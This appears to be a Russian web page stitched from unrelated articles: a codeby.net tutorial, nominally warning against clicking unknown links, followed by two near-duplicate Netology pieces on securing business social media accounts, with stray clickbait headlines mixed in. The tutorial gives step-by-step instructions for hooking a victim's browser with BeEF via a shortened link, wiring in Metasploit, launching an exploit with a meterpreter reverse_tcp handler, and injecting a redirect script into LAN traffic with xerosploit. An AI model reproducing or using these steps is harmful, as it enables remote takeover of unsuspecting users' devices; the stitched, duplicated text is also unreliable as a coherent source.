Приветствую друзья! Сегодня мы поговорим о всей опасности перехода по URL от неизвестных лиц. Также будет много практики. Надеюсь вам будет интересно. Приступим!
Введение.
Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?
Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. Сегодня мы на примерах убедимся во всей опасности.
- Первое что может случится при переходе по ссылке это то, что злоумышленник получет доступ к вашим аккаунтам социальных сетей.
Данный метод мы затрагивать не будем. Он был описан мной в цикле статей — Получение доступа к аккаунтам социальных сетей.
- Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.
- Подгрузить малварь используя exploit pack.
Подгружаем малварь.
15 Явных Признаков, Что Ваш Телефон Взломали
Exploit pack — это своеобразная связка эксплойтов.
К прибольшому сожалению я не буду показывать в этой теме использование exploit pack’а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня beef в связке с metasploit. Этот способ я придумал совсем недавно.
Beef — это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.
Metasploit — фреймворк для поиска и эксплоутации уязвимостей. То есть для проветения тестирования на проникновение.
Запуск beef.
В терминале пишем
beef-xss
Переходим по ссылке ниже
Ссылка скрыта от гостей
Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.
Нам нужно чтобы «жертва» выполнила у себя скрипт hook.js
Нужно подгрузить его ей.
http://<ваш ip>:3000/demos/basic.html
Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.
Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:
- Открываем файл config.yaml у beef. Часто он находится в этой дериктории — /usr/share/beef-xss/
- Ищем там раздел extension. У metasploit меняем значение параметра на true
- Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
- Запускаем metasploit и пишем следующее
msf> load msgrpc
5 способов проверить, взломан ли ваш Android смартфон
И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.
Переходим в /usr/share/beef-xss/ и пишем
./beef -x
После этого в beef загрузятся exploit’ы.
Теперь нам доступны exploit’ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.
И как видно на скриншоте — это windows.
Теперь переходим во вкладку Commands и ищем — msf_ms05_054_onload
Выберем payload. Так как у моей «жертвы» windows я выбрал — windows/meterpreter/reverse_tcp
Заполняем все поля.
Теперь открываем msf и пишем
1. use exploit/multi/handler 2. set payload windows/meterpreter/reverse_tcp 3. set LHOST 4. exploit
Во второй команде пишете название пайлоада который выбрали в beef. Вот и все)
А пользователь всего-то перешел по ссылке.
А что если пользователь придерживается правил «я по незнакомым ссылкам не хожу»? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:
document.location.href=»http://:3000/demos/basic.html»;
Запускаем xerosploit. И выбираем:
scan —> ip жертвы —> injectjs —> run —> путь до hack.js
Далее проделываем выше описанное.Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны друзья)
Вывод
Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб ресурс? Последствия просто ужасны. Надеюсь вам понравилась данная статья!
Источник: codeby.net
Безопасность бизнеса в Сети: как защититься от взломов и сохранить репутацию
Рассказываем, как уберечься от взломов и хакерских атак на рабочие страницы в соцсетях. И делимся опытом по следам пережитой атаки во ВКонтакте.
Крупные интернет-компании и соцсети регулярно обнаруживают и устраняют уязвимости, которые позволяют хакерам взламывать профили. Так, в 2018 году Facebook сообщила об уязвимости, затронувшей 50 млн пользователей, а в мае 2019-го стало известно об уязвимости WhatsApp, с помощью которой хакеры устанавливали на смартфоны жертв шпионское программное обеспечение.
При этом причиной взлома аккаунтов в соцсетях зачастую оказывается элементарная невнимательность и типичное «недосмотрели».
Получается, что стопроцентной гарантии безопасности просто не существует: даже крупнейшие компании и их соцсети подвергаются взломам, что уж говорить о менее крупном бизнесе.
И даже если взлом не навредил подписчикам бизнес-аккаунта, он может оставить след на репутации компании. Мы тоже пережили попытку взлома во ВКонтакте, к счастью — быстро вернули доступы без последствий для наших подписчиков.
Рассказываем, какие меры предпринять, чтобы обезопасить аккаунт и быстро вернуть доступ в случае кибератаки.
юрий наместников
Руководитель российского исследовательского центра «Лаборатории Касперского»
Сегодня популярные корпоративные аккаунты в соцсетях можно смело приравнять к СМИ. Зачастую просмотр одного ролика там может измеряться миллионами, а количество репостов и комментариев — стремиться к бесконечности. Кроме того, корпоративный аккаунт в соцсетях — это ещё и инструмент продаж, который позволяет бизнесу успешно расти.
С приходом популярности увеличиваются и риски, связанные с интернет-безопасностью. Известно немало случаев атак на страницы в соцсетях.
Последствия могут быть самыми плачевными: потеря всего контента без возможности его восстановления, дискредитация блога, урон репутации компании, потеря бизнеса.
Редакция нетологии
Как взламывают бизнес в Сети: основные приемы киберзлоумышленников
Мы узнали у «Лаборатории Касперского» об основных приемах киберпреступников. Полезно знать, чтобы понимать, с какой стороны могут атаковать злоумышленники.
Целевые атаки на аккаунт, которые приводят к взлому.
DDoS-атака (актуально для standalone-блогов), так как провести DDoS-атаку на ресурсы на крупных площадках (ЖЖ, Facebook, ВКонтакте, WordPress) технически слишком сложно. Мощности крупных площадок позволяют выдержать множественные атакующие обращения, а вот на отдельных блогах — нет. Совет: лучше заводить блоги на базе крупного ресурса, что сводит риски DDoS-атаки к минимуму.
Аккаунты-клоны: известен случай телеведущей Елены Малышевой, которая продвигала определённую диету в интернете. Через некоторое время появились ресурсы-клоны, использовавшие ее имя и фото для раскрутки совсем другой диеты и средств для похудения.
А в апреле 2017 года случился скандал с фейковыми Facebook-аккаунтами представительств РФ в Словакии и Чехии.
Ещё злоумышленники подделывают домены: в названии домена меняют одну букву или знак на другой похожий. Допустим, что мошенник решил подделать домен Варламова (Varlamov.ru), — вместо латинской O написал ноль. Получится Varlam0v.ru.
Целевой фишинг. Найти информацию о крупной компании и её сотрудниках не составляет особого труда: люди сами указывают места работы в социальных сетях. Поэтому и подготовить ориентированное именно на сотрудника компании фишинговую атаку, зная как личную информацию о нём, так и рабочую, намного проще. Злоумышленник отправляет спам-письмо с просьбой: например, получить документы о коммерческом предложении или прислать ссылку якобы с аккаунта контрагента в стиле «Изменение схемы работы с ИТ-системой».
Как мошенники вредят владельцам взломанных аккаунтов
Дискредитируют: заменяют контент или публикуют компрометирующие данные, которые стали известны в результате взлома. Иногда просто удаляют аккаунт. Известен пример со взломом YouTube-канала «Эха Москвы», когда злоумышленник уничтожил аккаунт компании.
Используют аккаунт для рекламы: публикуют рекламу, рассылают спам.
Шантажируют владельца аккаунта: требуют выкуп или определенные действия за возврат доступа к аккаунту или сохранения втайне полученной информации.
Мошенничают: рассылают различные просьбы и предложения подписчикам и контрагентам.
Как защитить профиль во ВКонтакте, Facebook и Instagram: инструкции от техподдержки
Чтобы уберечься от взлома, придерживайтесь базовых правил безопасности. А если ведёте бизнес в соцсетях — тем более. Мы собрали советы от техподдержек соцсетей.
Как защититься во ВКонтакте. Соблюдайте основы безопасности во ВКонтакте и обязательно включите двухфакторную аутентификацию.
Также прочитайте, что делать, если сообщество во ВКонтакте взломали. Если что-то случится, вы сразу будете знать, как поступить. Потому что при взломе каждая секунда на счету.
Как защититься в Facebook. Если подозреваете, что кто-то имеет доступ к вашему аккаунту, действуйте по инструкции. Также придерживайтесь базовых правил для защиты профиля в Facebook. Не забудьте включить двухфакторную аутентификацию. А ещё в Facebook есть возможность выбрать друзей или родственников, которые станут вашими доверенными лицами.
Как защититься в Instagram. Придерживайтесь стандартных правил безопасности в соцсетях: меняйте пароль раз в полгода, не пишите пароль на бумажке, не давайте свой смартфон посторонним.
И да, настройте двухфакторную аутентификацию. Зайдите в «Настройки» → «Конфиденциальность и безопасность» → «Двухфакторная аутентификация».
Опыт Нетологии
В апреле страница Нетологии во ВКонтакте подверглась атаке. К счастью, мы быстро вернули доступы без последствий для наших подписчиков. Рассказываем, какие действия предприняли.
пётр жуковский
У меня пропал раздел со статистикой. Перезагрузил страницу и понял, что я в черном списке. Сразу же попросил остальных администраторов группы как можно быстрее удалить все страницы, у которых есть права в сообществе и которые могут быть взломаны.
Сразу же написали в техподдержку ВКонтакте. Так можно не только получить помощь по возврату доступа к странице, но и обезопасить себя от возможной блокировки страницы за нарушение правил сообщества.
Для остановки спама, написали напрямую сотрудникам ВКонтакте, чтобы они заморозили отправку сообщений от имени сообщества и закрыли комментарии.
В нашем сообществе в Facebook разместили пост о том, что сообщения в сообществе во ВКонтакте рассылают мошенники и их нужно игнорировать.
Как подписчики отнеслись к тому, что нас взломали? Мы оперативно заморозили рассылку сообщений, быстро вернули доступ к группе и написали пост с объяснениями, негатива было очень мало. С момента начала рассылки спама до возвращения доступа к группе прошло не больше часа, а возможность отправки спама заморозили за 20 минут.
Как отработали негатив или обыграли эту ситуацию, чтобы успокоить пользователей? В этот же день мы извинились перед подписчиками за неудобства и выпустили пост о том, как обезопасить себя от подобных проблем.
Мы используем двухфакторную аутентификацию для всех страниц администраторов. Также дополнили корпоративный гайд о защите своей страницы.
После атаки мы опубликовали чеклист по безопасности в соцсетях в нашем Instagram.
Источник: netology.ru
Безопасность бизнеса в Сети: как защититься от взломов и сохранить репутацию
«Нетология» рассказывает, как уберечься от взломов и хакерских атак на рабочие страницы в соцсетях. И делится опытом по следам пережитой атаки во «ВКонтакте».
896 просмотров
Крупные интернет-компании и соцсети регулярно обнаруживают и устраняют уязвимости, которые позволяют хакерам взламывать профили. Так, в 2018 году Facebook сообщила об уязвимости, затронувшей 50 млн пользователей, а в мае 2019-го стало известно об уязвимости WhatsApp, с помощью которой хакеры устанавливали на смартфоны жертв шпионское программное обеспечение.
При этом причиной взлома аккаунтов в соцсетях зачастую оказывается элементарная невнимательность и типичное «недосмотрели».
Получается, что стопроцентной гарантии безопасности просто не существует: даже крупнейшие компании и их соцсети подвергаются взломам, что уж говорить о менее крупном бизнесе.
И даже если взлом не навредил подписчикам бизнес-аккаунта, он может оставить след на репутации компании. Мы тоже пережили попытку взлома во «ВКонтакте», к счастью — быстро вернули доступы без последствий для наших подписчиков.
Рассказываем, какие меры предпринять, чтобы обезопасить аккаунт и быстро вернуть доступ в случае кибератаки.
Сегодня популярные корпоративные аккаунты в соцсетях можно смело приравнять к СМИ. Зачастую просмотр одного ролика там может измеряться миллионами, а количество репостов и комментариев — стремиться к бесконечности. Кроме того, корпоративный аккаунт в соцсетях — это еще и инструмент продаж, который позволяет бизнесу успешно расти.
С приходом популярности увеличиваются и риски, связанные с интернет-безопасностью. Известно немало случаев атак на страницы в соцсетях. Последствия могут быть самыми плачевными: потеря всего контента без возможности его восстановления, дискредитация блога, урон репутации компании, потеря бизнеса.
Юрий Наместников, руководитель российского исследовательского центра «Лаборатории Касперского».
Как взламывают бизнес в Сети: основные приемы киберзлоумышленников
Мы узнали у «Лаборатории Касперского» об основных приемах киберпреступников. Полезно знать, чтобы понимать, с какой стороны могут атаковать злоумышленники.
1. Целевые атаки на аккаунт, которые приводят к взлому.
2. DDoS-атака (актуально для standalone-блогов), так как провести DDoS-атаку на ресурсы на крупных площадках (ЖЖ, Facebook, «ВКонтакте», WordPress) технически слишком сложно. Мощности крупных площадок позволяют выдержать множественные атакующие обращения, а вот на отдельных блогах — нет. Совет: лучше заводить блоги на базе крупного ресурса, что сводит риски DDoS-атаки к минимуму.
3. Аккаунты-клоны: известен случай телеведущей Елены Малышевой, которая продвигала определенную диету в интернете. Через некоторое время появились ресурсы-клоны, использовавшие ее имя и фото для раскрутки совсем другой диеты и средств для похудения.
А в апреле 2017 года случился скандал с фейковыми Facebook-аккаунтами представительств РФ в Словакии и Чехии.
Еще злоумышленники подделывают домены: в названии домена меняют одну букву или знак на другой похожий. Допустим, что мошенник решил подделать домен Варламова (Varlamov.ru), — вместо латинской O написал ноль. Получится Varlam0v.ru
4. Целевой фишинг. Найти информацию о крупной компании и ее сотрудниках не составляет особого труда: люди сами указывают места работы в социальных сетях. Поэтому и подготовить ориентированное именно на сотрудника компании фишинговую атаку, зная как личную информацию о нем, так и рабочую, намного проще. Злоумышленник отправляет спам-письмо с просьбой: например, получить документы о коммерческом предложении или прислать ссылку якобы с аккаунта контрагента в стиле «Изменение схемы работы с ИТ-системой».
Как мошенники вредят владельцам взломанных аккаунтов
1. Дискредитируют: заменяют контент или публикуют компрометирующие данные, которые стали известны в результате взлома. Иногда просто удаляют аккаунт. Известен пример со взломом YouTube-канала «Эха Москвы», когда злоумышленник уничтожил аккаунт компании.
2. Используют аккаунт для рекламы: публикуют рекламу, рассылают спам.
3. Шантажируют владельца аккаунта: требуют выкуп или определенные действия за возврат доступа к аккаунту или сохранения в тайне полученной информации.
4. Мошенничают: рассылают различные просьбы и предложения подписчикам и контрагентам.
Как защитить профиль во «ВКонтакте», Facebook и Instagram: инструкции от техподдержки
Чтобы уберечься от взлома, придерживайтесь базовых правил безопасности. А если ведете бизнес в соцсетях — тем более. Мы собрали советы от техподдержек соцсетей.
Как защититься во «ВКонтакте». Соблюдайте основы безопасности во «ВКонтакте» и обязательно включите двухфакторную аутентификацию.
Включение двухфакторной аутентификации во «ВКонтакте» Техподдержка «ВКонтакте»
Также прочитайте что делать, если сообщество во «ВКонтакте» взломали. Если что-то случится, вы сразу будете знать, как поступить. Потому что при взломе каждая секунда на счету.
Как защититься в Facebook. Если подозреваете, что кто-то имеет доступ к вашему аккаунту, действуйте по инструкции. Также придерживайтесь базовых правил для защиты профиля в Facebook. Не забудьте включить двухфакторную аутентификацию. А еще в Facebook есть возможность выбрать друзей или родственников, которые станут вашими доверенными лицами.
Как защититься в Instagram. Придерживайтесь стандартный правил безопасности в соцсетях: меняйте пароль раз в полгода, не пишите пароль на бумажке, не давайте свой смартфон посторонним.
И да, настройте двухфакторную аутентификацию. Зайдите в «Настройки» → «Конфиденциальность и безопасность» → «Двухфакторная аутентификация».
Настройки Instagram
Да, «Нетологию» тоже атаковали. Делимся опытом
В апреле страница «Нетологии» во «ВКонтакте» подверглась атаке. К счастью, мы быстро вернули доступы без последствий для наших подписчиков. Рассказываем, какие действия предприняли.
У меня пропал раздел со статистикой. Перезагрузил страницу и понял, что я в черном списке. Сразу же попросил остальных администраторов группы как можно быстрее удалить все страницы, у которых есть права в сообществе и которые могут быть взломаны.
В сразу же написали в техподдержку «ВКонтакте». Так можно не только получить помощь в возврату доступа к странице, но и обезопасить себя от возможной блокировки страницы за нарушение правил сообщества.
Для остановки спама, написали напрямую сотрудникам «ВКонтакте», чтобы они заморозили отправку сообщений от имени сообщества и закрыли комментарии.
В нашем сообществе в Facebook разместили пост о том, что сообщения в сообществе во «ВКонтакте» рассылают мошенники и их нужно игнорировать.
Как подписчики отнеслись к тому, что нас взломали? Мы оперативно заморозили рассылку сообщений, быстро вернули доступ к группе и написали пост с объяснениями, негатива было очень мало. С момента начала рассылки спама до возвращения доступа к группе прошло не больше часа, а возможность отправки спама заморозили за 20 минут.
Как отработали негатив или или обыграли эту ситуацию, чтобы успокоить пользователей? В этот же день мы извинились перед подписчиками за неудобства и выпустили пост о том, как обезопасить себя от подобных проблем.
Мы используем двухфакторную аутентификацию для всех страниц администраторов. Также дополнили корпоративный гайд о защите своей страницы.
Петр Жуковский, SMM «Нетологии»
После атаки мы опубликовали чеклист по безопасности в соцсетях в нашем Instagram.
Источник: vc.ru